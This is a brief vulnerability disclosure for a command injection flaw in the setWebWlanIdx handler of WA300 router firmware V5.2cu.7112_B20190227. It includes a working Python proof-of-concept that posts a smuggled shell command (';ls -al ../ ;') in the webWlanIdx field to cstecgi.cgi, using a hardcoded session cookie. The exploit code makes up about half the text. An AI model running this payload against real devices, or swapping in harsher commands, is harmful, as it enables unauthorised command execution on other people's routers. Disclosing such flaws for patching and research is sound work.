WA300 V5.2cu.7112_B20190227
In the WA300 V5.2cu.7112_B20190227 firmware has a command injection vulnerability in the setWebWlanIdx function. The Var variable receives the webWlanIdx parameter from a POST request. However, since the user can control the input of webWlanIdx, the CsteSystem can cause a command injection vulnerability.

/import requests
url = "<http://127.0.0.1/cgi-bin/cstecgi.cgi>"
cookie = {"Cookie":"SESSION_ID=2:1721039211:2"}
data = {"webWlanIdx":";ls -al ../ ;","topicurl":"setting/setWebWlanIdx"}
response = requests.post(url, cookies=cookie, json=data)
print(response.text)
print(response)
